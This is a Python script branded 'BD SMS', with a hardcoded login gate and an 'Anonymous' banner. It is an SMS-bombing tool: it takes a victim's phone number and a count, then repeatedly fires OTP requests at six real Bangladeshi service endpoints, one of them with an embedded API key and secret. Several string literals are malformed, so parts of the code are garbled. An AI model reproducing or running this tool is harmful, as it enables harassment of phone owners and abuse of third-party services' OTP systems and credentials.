import sys

print('\'+'\33[1;31m'+' 	  	 This File is lock !'+'\33[0m'+'\'+'\33[1;36m'+'    please!'+'\33[0m'+'\33[1;32m'+' Enter the correct username and password:'+'\33[0m')

n=5

while n<10:

	username="Team2B"

	password="team2b"

	

	

	intusername=str(input('\'+'\33[1;33m'+'Enter The Username:'+'\33[0m'))

	intpassword=str(input('\33[1;33m'+'Enter The Password:'+'\33[0m'))

	

	if username==intusername and password==intpassword:

		print('\33[1;32m','\Login sussecful','\33[0m'+'(😍)')

		print('\')

		break

		

	else:

		print('\33[1;31m','\Your username or password is Wrong!','\33[0m'+'(😥)')

		print('\')

		sys.exit()

		

		

#past main part

import requests

from requests.structures import CaseInsensitiveDict

import os

import sys

import time

os.system("pip install requests")

os.system("clear")

red="\33[0;31m"          # Red

yellow="\33[0;33m"       # Yellow

green="\33[0;32m"        # Green

color_off="\33[0m"       # Text Reset

bblack="\33[1;30m"       # Black

bred="\33[1;31m"         # Red

ured="\33[4;31m"         # Red

on_green="\33[42m"       # Green

blue="\33[0;34m"         # Blue

lightblue = '\33[94m'

red = '\33[91m'

white = '\3[97m'

yellow = '\3[93m'

green = '\33[1;32m'

cyan  = "\33[96m"

end = '\33[0m'

purple="\33[0;35m"

logo=(green+"""
 222222222222222    BBBBBBBBBBBBBBBBB   
2:::::::::::::::22  B::::::::::::::::B  
2::::::222222:::::2 B::::::BBBBBB:::::B 
2222222     2:::::2 BB:::::B     B:::::B
            2:::::2   B::::B     B:::::B
            2:::::2   B::::B     B:::::B
         2222::::2    B::::BBBBBB:::::B 
    22222::::::22     B:::::::::::::BB  
  22::::::::222       B::::BBBBBB:::::B 
 2:::::22222          B::::B     B:::::B
2:::::2               B::::B     B:::::B
2:::::2               B::::B     B:::::B
2:::::2       222222BB:::::BBBBBB::::::B
2::::::2222222:::::2B:::::::::::::::::B 
2::::::::::::::::::2B::::::::::::::::B  
22222222222222222222BBBBBBBBBBBBBBBBB   
""")

line=(yellow+"======================================================")

tversion=(cyan+"\\     Version : 1.0.0 ")

line2=("\\~~~~~~~~~~~~~~~~~~~~~~~~~~")

dtls=(yellow+"\\ᴄʀᴇᴀᴛᴇᴅ ʙʏ : Avro Lx \ \\ WE ARE ANONYMOUS ")

note=(red+"Note: I wont be responsible fo any illigal activites.")

print(logo)

print(" ")

print(dtls)

print(tversion)

print(line)

print(note)

print(line)

()

os.system("clear")

print(logo)

print(" ")

print(dtls)

print(tversion)

print(line)

print(note)

print(line)

print(lightblue+'\\ If You Type [1] Sand it 3+ SMS')

print(' ')

number=str(input(red+"[➙] Enter Your Number [>]"))

amount=int(input(cyan+"[➙] Enter The Amount [>]"))

url1 = "https://ss.binge.buzz/otp/send/login"

headers1 = CaseInsensitiveDict()

headers1["Content-Type"] = "application/x-www-form-urlencoded"

data1 = "phone="+number

url2 = "https://api.daktarbhai.com/api/v2/otp/generate?=&api_key=BUFWICFGGNILMSLIYUVH&api_secret=WZENOMMJPOKHYOMJSPOGZNAGMPAEZDMLNVXGMTVE&mobile=%2B88"+number+"&platform=app&activity=login"

headers2 = CaseInsensitiveDict()

headers2["Content-Type"] = "application/json"

headers2["Content-Length"] = "0"

url3 = "https://stage.bioscopelive.com/en/login/send-otp?phone=88"+number+"&operator=bd-otp"

url4 = "https://xrides.shohoz.com/api/v2/user/send-mobile-verification-code"

headers4 = CaseInsensitiveDict()

headers4["Content-Type"] = "application/json"

data4 = '{\mobile\:\'+number+'\}'

url5 = "https://addabaji.mobi/twocups-v1-robi/otp.php"

headers5 = CaseInsensitiveDict()

headers5["Content-Type"] = "application/x-www-form-urlencoded"

data5 = "msisdn="+number

url6 = "https://developer.quizgiri.xyz/api/v2.0/send-otp"

headers6 = CaseInsensitiveDict()

headers6["Content-Type"] = "application/json"

data6 = '{"phone":"'+number+'","country_code":"+880","fcm_token":null}'

for i in range (amount):

        resp1 = requests.post(url1, headers=headers1, data=data1)

        resp2 = requests.post(url2, headers=headers2)

        resp3 = requests.get(url3)

        resp4 = requests.post(url4, headers=headers4,data=data4)

        resp5 = requests.post(url5, headers=headers5, data=data5)

        resp = requests.post(url6, headers=headers6, data=data6)

        print(str(i+1)+green+'. ➙Success Requests Sand ⏳⌛')

print('                                 ')

print(cyan+'\\Thanks For Using BD SMS ')

os.system("Clear")
